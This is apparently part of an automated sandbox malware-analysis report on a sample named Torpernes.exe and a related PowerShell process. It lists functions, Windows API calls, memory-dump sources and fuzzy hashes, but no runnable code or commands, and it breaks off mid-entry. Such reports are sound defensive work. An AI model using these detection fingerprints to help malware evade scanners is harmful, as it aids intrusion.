                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: e6b80f368e9379a4ad57220527a7cd8197c4644bc7861db4fd93b3e8285cb9c6
                                            • Instruction ID: 9c13ad67afaae448f0a4b319dcddee29e535cfa81e2793328e176173c0848073
                                            • Opcode Fuzzy Hash: e6b80f368e9379a4ad57220527a7cd8197c4644bc7861db4fd93b3e8285cb9c6
                                            • Instruction Fuzzy Hash: D0017171500608AFDF205F11DD81A6F3666EB84354F108136FA04B91D1C77A9C52DFAE
                                            Function 00403717 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004036EF,00403511,?), ref: 00403731
                                            • GlobalFree.KERNEL32(?), ref: 00403738
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403729
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-3081826266
                                            • Opcode ID: 4e7f7c2125bebf8a47bea9b1e386030cefe453a8e1eea4b88b9a451776f0e8e5
                                            • Instruction ID: be347e1f20d4661a3264dec075a27cff7b7193600f0a8694255b986c9dfc1e8e
                                            • Opcode Fuzzy Hash: 4e7f7c2125bebf8a47bea9b1e386030cefe453a8e1eea4b88b9a451776f0e8e5
                                            • Instruction Fuzzy Hash: F9E0C273D010209BC7315F24FD0871AB7A8AF89F22F014166E9407B3A1C7746D534BD9
                                            Function 004058B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DD5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Torpernes.exe,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455,?), ref: 004058B6
                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DD5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Torpernes.exe,C:\Users\user\Desktop\Torpernes.exe,80000000,00000003,?,?,?,00000000,00403455), ref: 004058C6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-224404859
                                            • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                            • Instruction ID: eae7ed8f36c736b41726b3deb9da1b14232adbbebc1b68a94f02937717e3e755
                                            • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                            • Instruction Fuzzy Hash: 9BD05EB34019209AE3226704DC05E9F73ACEF11300B458466F841A21A5E3786D908AFD
                                            Function 004059EA Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 004059FA
                                            • lstrcmpiA.KERNEL32(00405C24,00000000), ref: 00405A12
                                            • CharNextA.USER32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A23
                                            • lstrlenA.KERNEL32(00405C24,?,00000000,00405C24,00000000,[Rename],00000000,00000000,00000000), ref: 00405A2C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1713787917.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1713769592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713806210.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1713823051.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1714025138.0000000000491000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Torpernes.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                            • Instruction ID: 4323e886e6002e66b9621bf4ea28c9688caf2d9046ca4a9676cfc0c1aa02b3f6
                                            • Opcode Fuzzy Hash: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                            • Instruction Fuzzy Hash: 1CF0C231604458AFC7029BA8DD8099FBBA8EF06364B2141A5F801F7211D274EE019FA9

                                            Executed Functions

                                            Function 0457EAD8 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82d39cf0a22fa3a2583fd876a6f993da32c403901b1c89889b28e4421293f4f2
                                            • Instruction ID: b374821c9e452aae327b03565c3da7b348f673a6e169a4e8935a1c9cce85f4c9
                                            • Opcode Fuzzy Hash: 82d39cf0a22fa3a2583fd876a6f993da32c403901b1c89889b28e4421293f4f2
                                            • Instruction Fuzzy Hash: 0EB16170E00319DFDB10CFA9E88679DBBF2BF88314F148579D819A7294EB74A845DB41
                                            Function 0457F3A8 Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 66a1d71ca2b5198bd0c532eb56cef31020d95002f37b78090fa1c2556f0097a8
                                            • Instruction ID: 011bbadb726de28654e0bbd36d21b23b0df59f9313471d9e56fca7f5a365f1fd
                                            • Opcode Fuzzy Hash: 66a1d71ca2b5198bd0c532eb56cef31020d95002f37b78090fa1c2556f0097a8
                                            • Instruction Fuzzy Hash: D2B16F72E002199FDF10CFA9E88579DBBF2BF88314F148539D815EB294EB74A845DB81
                                            Function 070A48D0 Relevance: 31.1, Strings: 24, Instructions: 1118COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                            • API String ID: 0-2699759020
                                            • Opcode ID: ac3fb74bbc722e6d1ef68a41a439a6f07d9070ddfa563a763b5e08cc0f40126d
                                            • Instruction ID: 4686bfcfe0ae57390c4ded219378f4949becd6779086005321730f3313c5e9d5
                                            • Opcode Fuzzy Hash: ac3fb74bbc722e6d1ef68a41a439a6f07d9070ddfa563a763b5e08cc0f40126d
                                            • Instruction Fuzzy Hash: C8A2A3B4A00205DFD764CBA8C551BA97BF2FB85304F648569EA056F782CB72EC41CFA1
                                            Function 070A70A5 Relevance: 12.9, Strings: 10, Instructions: 400COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                            • API String ID: 0-788909730
                                            • Opcode ID: 10dddd637c8aa06ad81d9ad5f888e53f4fdf1f335d47778793a585f5c75d8204
                                            • Instruction ID: 1ab71786169032db6edabc765f5054a531b0e6cd3f5c89d6d9359c02fdd97f6e
                                            • Opcode Fuzzy Hash: 10dddd637c8aa06ad81d9ad5f888e53f4fdf1f335d47778793a585f5c75d8204
                                            • Instruction Fuzzy Hash: D3D159B1B04206AFCB658FB8C414A6E7BE2EF85310F14D6AAE9158F342DB31DC45C7A1
                                            Function 070ABCFF Relevance: 12.2, Strings: 9, Instructions: 994COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$4~l$4~l$x.rk$x.rk$-rk
                                            • API String ID: 0-1824520803
                                            • Opcode ID: 97213886e4fab71af4ad0a1152b43362d1f1a0bad612a7d33ce44272bac5f1a7
                                            • Instruction ID: 7d4a0df485f0b871c996c400df62382d6d68c185eb346381a81e583da4ca07ba
                                            • Opcode Fuzzy Hash: 97213886e4fab71af4ad0a1152b43362d1f1a0bad612a7d33ce44272bac5f1a7
                                            • Instruction Fuzzy Hash: 779292B4A002149FDB60DB58CD51BAABBF2FB89304F5185A5E5095F781CB32ED81CFA1
                                            Function 070AFB6B Relevance: 9.1, Strings: 7, Instructions: 318COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                            • API String ID: 0-3199432138
                                            • Opcode ID: 90cf6136350d523aa0adebcfa1fb096a9e2ce8704fe0342658a326dbad67c902
                                            • Instruction ID: eb104810c9c88eafaf4f62fed05add6832fc3ff07128b6a16a46fdedd06c4426
                                            • Opcode Fuzzy Hash: 90cf6136350d523aa0adebcfa1fb096a9e2ce8704fe0342658a326dbad67c902
                                            • Instruction Fuzzy Hash: 01A16CB1B04207AFCB658EA5C4007BE7BF2AF85311F148A6AD815CF252DB35ED46C7A1
                                            Function 070A3178 Relevance: 7.9, Strings: 6, Instructions: 373COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q$x.rk$-rk
                                            • API String ID: 0-2381548550
                                            • Opcode ID: 89f3843e01194e194b5133b312a0354dad751c52414bae1dee13f22c16ebcb51
                                            • Instruction ID: b4c0db977380336cb8419beb1809474f369d99d9be2cc74af59c2d8efddcfee4
                                            • Opcode Fuzzy Hash: 89f3843e01194e194b5133b312a0354dad751c52414bae1dee13f22c16ebcb51
                                            • Instruction Fuzzy Hash: 30E1C2B0B00205EFCB54CBA8C551BAEBBF2AF88305F54C529E5096F785CB71EC458BA1
                                            Function 070A0778 Relevance: 6.5, Strings: 5, Instructions: 230COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                            • API String ID: 0-3272787073
                                            • Opcode ID: 712e871a6e2836f22dc2533b2a879aaa138317dfb658b86c7549683ecfec5fd9
                                            • Instruction ID: 2cb01a5d687f084dd02b9f1a7cca70f05e79dbb1c4642681a6bf77c1205758f2
                                            • Opcode Fuzzy Hash: 712e871a6e2836f22dc2533b2a879aaa138317dfb658b86c7549683ecfec5fd9
                                            • Instruction Fuzzy Hash: 2B7127B1F0021AAFCB549BB884002BEBBE1AFC5315F24857AD859DB241EF31D945C7E1
                                            Function 070A386D Relevance: 5.7, Strings: 4, Instructions: 660COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$x.rk$-rk
                                            • API String ID: 0-1943341545
                                            • Opcode ID: 7dcee9c54041d4a7c8ac6b32dc76421ba305f2a4acfb9ca4c0b61b2200286469
                                            • Instruction ID: 37a23ebfba9562d088fbe53d6b045aed6e8b28bd1df78bbe5cb6700fc23fba65
                                            • Opcode Fuzzy Hash: 7dcee9c54041d4a7c8ac6b32dc76421ba305f2a4acfb9ca4c0b61b2200286469
                                            • Instruction Fuzzy Hash: A35271B4B002159FD750DB58C941B6ABBF2FB88304F54C5A5EA09AF381CB71ED858FA1
                                            Function 070A9110 Relevance: 5.6, Strings: 4, Instructions: 588COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$4'^q$4'^q
                                            • API String ID: 0-1420252700
                                            • Opcode ID: ccc35f13b75f37810e91b85bc627d5ed9f90ddf70d0384d61e466e2fc364eaac
                                            • Instruction ID: 162845e13cd0c6d1f76532a29a682e29525af7563047a8bd33173d0c7644fd50
                                            • Opcode Fuzzy Hash: ccc35f13b75f37810e91b85bc627d5ed9f90ddf70d0384d61e466e2fc364eaac
                                            • Instruction Fuzzy Hash: 2E1257B1B14256AFCB258BB888117AA7BE29FC6315F14C5AAD905CF381DB31E845C3A1
                                            Function 070A3176 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$x.rk$-rk
                                            • API String ID: 0-1943341545
                                            • Opcode ID: 5e5b17ffd75a108b602fa0220ae7237e40b15d1c4b89971fc66b796faa15a763
                                            • Instruction ID: beebbba387099b79f371759fe0af05094f30e986f2ea7a19e04df587aabc8ed2
                                            • Opcode Fuzzy Hash: 5e5b17ffd75a108b602fa0220ae7237e40b15d1c4b89971fc66b796faa15a763
                                            • Instruction Fuzzy Hash: 71B18EB0A00205EFCB54CF98C541BAEFBF2AB88304F55C619E5196F795CB71E8458BA1
                                            Function 070A4262 Relevance: 4.4, Strings: 3, Instructions: 644COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$x.rk$-rk
                                            • API String ID: 0-1520546824
                                            • Opcode ID: ba2e40f259b5d1427d7911ec636b348ed68725d0d2a808831bd141784227d016
                                            • Instruction ID: 55382d85a67ac98680780b0d7c47b1c8ac2e3cf67a3e7257be3cd04599ed25e4
                                            • Opcode Fuzzy Hash: ba2e40f259b5d1427d7911ec636b348ed68725d0d2a808831bd141784227d016
                                            • Instruction Fuzzy Hash: A0527EB4B002159FD760DB58C941B6ABBF2FB88304F54C5A5EA099F391CB71ED818FA1
                                            Function 070A37CE Relevance: 4.4, Strings: 3, Instructions: 631COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$x.rk$-rk
                                            • API String ID: 0-1520546824
                                            • Opcode ID: 639de2e850cf5f0c67dd470a79c519f9e10f41b9e8085611a3251de169664c76
                                            • Instruction ID: a9f729fb677e041208e3acb02c077ee77f02325a3cdd96bcdecc30892712fbb8
                                            • Opcode Fuzzy Hash: 639de2e850cf5f0c67dd470a79c519f9e10f41b9e8085611a3251de169664c76
                                            • Instruction Fuzzy Hash: 26427EB4A002159FDB50CB58C941F6ABBF2FB88304F54C595EA09AF391CB71ED858FA1
                                            Function 070AC54B Relevance: 4.4, Strings: 3, Instructions: 621COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$x.rk$-rk
                                            • API String ID: 0-1520546824
                                            • Opcode ID: 3ef9640f3a1f73b2094cf9fe24835f93021c567451b57f31d8ef52b9f2ef8374
                                            • Instruction ID: a8679fd599146eb2d4aa49d50d1824c163a860262369d90ca316aebf40a0ff50
                                            • Opcode Fuzzy Hash: 3ef9640f3a1f73b2094cf9fe24835f93021c567451b57f31d8ef52b9f2ef8374
                                            • Instruction Fuzzy Hash: 484261B4B002149FD750DB58CD51BAABBF2EB89304F5185A5EA095F381CB72ED81CF91
                                            Function 0457AFE8 Relevance: 4.3, Strings: 3, Instructions: 521COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2171091198.0000000004570000.00000040.00000800.00020000.00000000.sdmp, Offset: 04570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_4570000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hbq$$^q$$^q
                                            • API String ID: 0-1611274095
                                            • Opcode ID: 1e2312792ee3c0fff942ed7cefdbfce6f65afb17d4a64d288ab232fd6ee7feb4
                                            • Instruction ID: 889f0673af3cf6c5383f8fcc5f3400ae46fe25631710d1bfb9ead7b15549464c
                                            • Opcode Fuzzy Hash: 1e2312792ee3c0fff942ed7cefdbfce6f65afb17d4a64d288ab232fd6ee7feb4
                                            • Instruction Fuzzy Hash: 3C225E30B006189FCB25DB28D855BAEB7B6BF89304F1084A9D409AB355DF35EE85DF81
                                            Function 070AC632 Relevance: 4.2, Strings: 3, Instructions: 468COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$x.rk$-rk
                                            • API String ID: 0-1520546824
                                            • Opcode ID: 1148db7ee8b229f6ba3579e777ff9f4c1a6d5e58c819f2945a127f24cbff65a3
                                            • Instruction ID: 87dc3e18d43ae570fab265f0ff36cae705d7fd1bc074b2beaee66f569c3c5588
                                            • Opcode Fuzzy Hash: 1148db7ee8b229f6ba3579e777ff9f4c1a6d5e58c819f2945a127f24cbff65a3
                                            • Instruction Fuzzy Hash: BE1282B4B002149FD750DB58CD51BAABBF2EB89304F5185A5EA095F381CB72ED81CFA1
                                            Function 070AC6D1 Relevance: 4.2, Strings: 3, Instructions: 425COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4~l$x.rk
                                            • API String ID: 0-1660331992
                                            • Opcode ID: cb7f5d172f2d97403def44eb293044b2bf34bde026f987407d6a13f3951926e0
                                            • Instruction ID: 4f484fdb9681fa3c007164b1cab4b4a6bff3c74ae5bd7eb74d2fb1076419d665
                                            • Opcode Fuzzy Hash: cb7f5d172f2d97403def44eb293044b2bf34bde026f987407d6a13f3951926e0
                                            • Instruction Fuzzy Hash: F7125EB4A00215DFDB64CB54CD41BAAB7B2BB85304F55C2E5D509AB781CB32ED81CFA1
                                            Function 070AC6BB Relevance: 4.1, Strings: 3, Instructions: 331COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4~l$x.rk
                                            • API String ID: 0-1660331992
                                            • Opcode ID: eb69deec45c4313ee3b0cb0269c740e360a7032eebc5e0ccd816778609741419
                                            • Instruction ID: 1aa5a8c40977889978bea17f211ee3e1696577b239438dde76898d94decc2440
                                            • Opcode Fuzzy Hash: eb69deec45c4313ee3b0cb0269c740e360a7032eebc5e0ccd816778609741419
                                            • Instruction Fuzzy Hash: 87E14EB4A00215DFEB60CB54CD41BAAB7B2BB85304F55C6E5D509AB741CB32ED81CF61
                                            Function 070A1040 Relevance: 3.0, Strings: 2, Instructions: 493COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: tP^q$tP^q
                                            • API String ID: 0-309238000
                                            • Opcode ID: f2b12157f331af344a241df5b2fda6b3f28ca82de1db27b3ab2331f672432a1c
                                            • Instruction ID: 3080b963c7b5f4fc1b4ec5927a786ade587804c7bcde2d05c336abb4a8c38d90
                                            • Opcode Fuzzy Hash: f2b12157f331af344a241df5b2fda6b3f28ca82de1db27b3ab2331f672432a1c
                                            • Instruction Fuzzy Hash: 7B12B2B0B00209EFD754CB98C541B6ABBF2AF89314F14C569EA199F391CB71EC41CBA1
                                            Function 070A3618 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2178374135.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: x.rk
                                            • API String ID: 0-2054528801
                                            • Opcode ID: aa6f69e5aa9fe326b7da92f071d626448b8029969702853e8e9d364ba4a4fcce
                                            • Instruction ID: 4a57beeccc0b431b51899d4f8bc0efd988a3a0b8101217aeda4332eb68ad6eae
